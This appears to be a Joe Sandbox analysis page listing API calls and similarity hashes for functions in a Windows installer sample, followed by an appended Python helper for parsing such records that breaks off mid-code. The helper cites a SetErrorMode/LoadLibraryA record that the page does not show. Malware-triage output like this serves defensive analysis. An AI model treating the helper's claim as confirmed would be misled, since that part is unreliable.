• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
• Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
• Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
• Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
• Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
APIs
• SetActiveWindow.USER32(?), ref: 0046A02D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ActiveWindow
• String ID: PrepareToInstall
• API String ID: 2558294473-1101760603
• Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
• Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
• Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
• Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID:
• String ID: /:*?"<>|
• API String ID: 0-4078764451
• Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
• Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
• Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
• Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
APIs
• SetActiveWindow.USER32(?), ref: 00482676
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
• Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
• Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
• Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
• Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
• Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
Strings
• Inno Setup: Setup Version, xrefs: 0046EE65
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
• Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
• Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
• Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
• Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
• Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
• Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
• Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
• Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
  • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
  • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
• SendNotifyMessageA.USER32(0001041E,00000496,00002711,-00000001), ref: 0047E6BA
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: EnumFontsMessageNotifyReleaseSend
• String ID:
• API String ID: 2649214853-0
• Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
• Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
• Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
• Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                          • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMetricsMultiSystemWide
                                                                                        • String ID: /G
                                                                                        • API String ID: 224039744-2088674125
                                                                                        • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                        • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                        • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                        • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                          • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                          • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                          • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                          • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 296031713-0
                                                                                        • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                        • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                        • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                        • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                        APIs
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                        • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseEnum
                                                                                        • String ID:
                                                                                        • API String ID: 2818636725-0
                                                                                        • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                        • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                        • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                        • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2919029540-0
                                                                                        • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                        • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                        • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                        • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                        • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindFree
                                                                                        • String ID:
                                                                                        • API String ID: 4097029671-0
                                                                                        • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                        • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                        • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                        • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                        • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CurrentEnumWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2396873506-0
                                                                                        • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                        • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                        • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                        • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                        APIs
                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastMove
                                                                                        • String ID:
                                                                                        • API String ID: 55378915-0
                                                                                        • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                        • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                        • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                        • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                        • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                        • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                        • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                        • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorLoad
                                                                                        • String ID:
                                                                                        • API String ID: 3238433803-0
                                                                                        • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                        • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                        • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                        • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
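The function records on this page share one text layout: an APIs block listing the Win32 calls the function makes (with "Part of subcall function" marking calls that happen inside a callee), the argument values the analysis could recover ("?" where it could not) and a "ref:" call-site address, followed by a Similarity block with an API ID and fuzzy hashes for matching the function against other samples. Reading dozens of these by eye is slow, so below is a small Python parser for that layout that turns each record into structured calls and tags the function with what its API chain suggests, for instance the SetErrorMode(00008000) followed by LoadLibraryA pair at 0042E39E/0042E3CD, where 0x8000 is SEM_NOOPENFILEERRORBOX. This is an added triage helper, not Joe Sandbox code and not part of the report; the sample input is copied from three records on this page, while the capability labels, the suffix-stripping rule in canonical() and the pair-detection logic are my own assumptions.

```python
"""Parse Joe Sandbox function records (the text blocks on this page) and tag each
function with what its API chain suggests. Added triage helper, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: API and Similarity lines copied from three records on this page.
SAMPLE = """\
APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
• GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
Similarity
• API ID: CreateErrorLastProcess
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E39E
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
Similarity
• API ID: ErrorLibraryLoadMode
APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420), ref: 00401A1F
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
"""
# Call line: optional "Part of subcall function X:" prefix, Api.MODULE, optional "(args)", "ref: addr".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?(?P<api>\w+)\."
    r"(?P<mod>[A-Za-z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
SEM_NOOPENFILEERRORBOX = 0x8000  # SetErrorMode flag: no dialog when a DLL fails to load
RT_RCDATA = 10                   # FindResource type for raw application data
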